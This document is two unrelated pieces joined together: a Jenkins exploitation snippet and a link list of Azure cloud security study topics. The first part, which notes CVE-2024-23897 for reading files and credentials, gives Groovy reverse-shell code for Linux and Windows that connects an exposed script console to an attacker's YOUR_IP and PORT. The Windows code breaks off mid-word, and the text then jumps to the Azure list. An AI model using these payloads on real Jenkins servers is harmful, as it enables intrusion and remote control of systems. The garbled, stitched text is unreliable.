Exploiting Jenkins / CVE-2024-23897 Often the script console is accessible without authentication due to misconfig on http://JENKINS_IP/script If you don't have access to script console and the version is vulnerable to CVE-2024-23897 , then exploit it to read files and get authentication credentials for Jenkins, (explained below) Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script. For Linux, r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() For Windows, String host="YOUR_IP"; int port=PORT; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea
Consolidated list of documentations and tutorials related to
Microsoft Azure Cloud Security. Can be used to perform a deep dive on
Azure security and for the preparation of Azure Security certification.
Feel free to share. Happy learning.
Preparation Notes
- Microsoft Azure Services #Index
- Scaling Up/Vertical Scaling vs Scaling Out/Horizontal Scaling.
- What are Azure availability sets?
- Difference between Azure management groups, Subscriptions and Resource groups
- Azure Active Directory : Overview.
- Azure Active Directory User Types and RBAC built-in roles
- Azure Active Directory User Source of Authority (SoA)
- Application Registration in Azure Active Directory
- Azure Active Directory Identity Protection.
- Azure AD Connect Overview.
- Azure Front Door : Overview.
- Hardening your Azure cloud platform and best practices.
Security Documentation Glossary.
- Azure Well-Architected Framework
- Introduction to Azure security
- Azure security documentation
- Using customer-managed keys in Azure Key Vault with Storage Service Encryption
- Start using Azure Active Directory Privileged Identity Management
- Privileged Identity Management documentation
- What is Azure Security Center?
- Azure Security Center documentation
- What is Conditional Access?
- Microsoft Security Development Life-cycle
- Azure Information Protection documentation
- Azure Sentinel documentation
- Azure Key Vault
- Azure Security Center for IoT documentation
- Azure Dedicated HSM documentation
- Azure DDoS Protection Standard overview
- Microsoft security architecture recommendations
- Become an Azure Sentinel Ninja: The complete level 400 training